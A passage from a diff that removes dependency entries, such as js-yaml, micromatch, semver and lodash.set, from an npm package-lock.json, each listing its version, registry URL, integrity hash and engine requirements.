"sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "dependencies": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - }, - "bin": { - "js-yaml": "bin/js-yaml.js" - } - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "node_modules/json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true, - "bin": { - "json5": "lib/cli.js" - }, - "engines": { - "node": ">=6" - } - }, - "node_modules/kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "node_modules/locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "dependencies": { - "p-locate": "^4.1.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/lodash.set": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/lodash.set/-/lodash.set-4.3.2.tgz", - "integrity": "sha512-4hNPN5jlm/N/HLMCO43v8BXKq9Z7QdAGc/VGrRD61w8gN9g/6jF9A4L1pbUgBLCffi0w9VsXfTOij5x8iTyFvg==" - }, - "node_modules/lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "dependencies": { - "yallist": "^3.0.2" - } - }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "dependencies": { - "tmpl": "1.0.5" - } - }, - "node_modules/merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "node_modules/micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "dependencies": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "dependencies": { - "brace-expansion": "^1.1.7" - }, - "engines": { - "node": "*" - } - }, - "node_modules/ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "node_modules/natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node_modules/node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node_modules/node-releases": { - "version": "2.0.13", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.13.tgz", - "integrity": "sha512-uYr7J37ae/ORWdZeQ1xxMJe3NtdmqMC/JZK+geofDrkLUApKRHPd18/TxtBOJ4A0/+uUIliorNrfYV6s1b02eQ==", - "dev": true - }, - "node_modules/normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "dependencies": { - "path-key": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "dependencies": { - "wrappy": "1" - } - }, - "node_modules/onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "dependencies": { - "mimic-fn": "^2.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "dependencies": { - "yocto-queue": "^0.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "dependencies": { - "p-limit": "^2.2.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/p-locate/node_modules/p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "dependencies": { - "p-try": "^2.0.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "node_modules/picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true, - "engines": { - "node": ">=8.6" - }, - "funding": { - "url": "https://github.com/sponsors/jonschlinkert" - } - }, - "node_modules/pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "dependencies": { - "find-up": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/pretty-format": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.6.1.tgz", - "integrity": "sha512-7jRj+yXO0W7e4/tSJKoR7HRIHLPPjtNaUGG2xxKQnGvPNRkgWcQ0AZX6P4KBRJN4FcTBWb3sa7DVUJmocYuoog==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/pretty-format/node_modules/ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "dependencies": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/pure-rand": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.0.2.tgz", - "integrity": "sha512-6Yg0ekpKICSjPswYOuC5sku/TSWaRYlA0qsXqJgM/d/4pLPHPuTxK7Nbf7jFKzAeedUhR8C7K9Uv63FBsSo8xQ==", - "dev": true, - "funding": [ - { - "type": "individual", - "url": "https://github.com/sponsors/dubzzz" - }, - { - "type": "opencollective", - "url": "https://opencollective.com/fast-check" - } - ] - }, - "node_modules/react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "node_modules/require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/resolve": { - "version": "1.22.2", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.2.tgz", - "integrity": "sha512-Sb+mjNHOULsBv818T40qSPeRiuWLyaGMa5ewydRLFimneixmVy2zdivRl+AF6jaYPC8ERxGDmFSiqui6SfPd+g==", - "dev": true, - "dependencies": { - "is-core-module": "^2.11.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - }, - "bin": { - "resolve": "bin/resolve" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "dependencies": { - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "dev": true, - "dependencies": { - "shebang-regex": "^3.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "node_modules/sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "node_modules/slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "dependencies": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "node_modules/sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "node_modules/stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "dependencies": { - "escape-string-regexp": "^2.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "dependencies": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "dev": true, - "dependencies": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "dev": true, - "dependencies": { - "ansi-regex": "^5.0.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "dependencies": { - "has-flag": "^4.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true, - "engines": { - "node": ">= 0.4" - }, - "funding": { - "url": "https://github.com/sponsors/ljharb" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha512-/OaKK0xYrs3DmxRYqL/yDc+FxFUVYhDlXMhRmv3z915w2HF1tnN1omB354j8VUGO/hbRzyD6Y3sA7v7GS/ceog==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/update-browserslist-db": { - "version": "1.0.11", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.0.11.tgz", - "integrity": "sha512-dCwEFf0/oT85M1fHBg4F0jtLwJrutGoHSQXCh7u4o2t1drG+c0a9Flnqww6XUKSfQMPpJBRjU8d4RXB09qtvaA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "escalade": "^3.1.1", - "picocolors": "^1.0.0" - }, - "bin": { - "update-browserslist-db": "cli.js" - }, - "peerDependencies": { - "browserslist": ">= 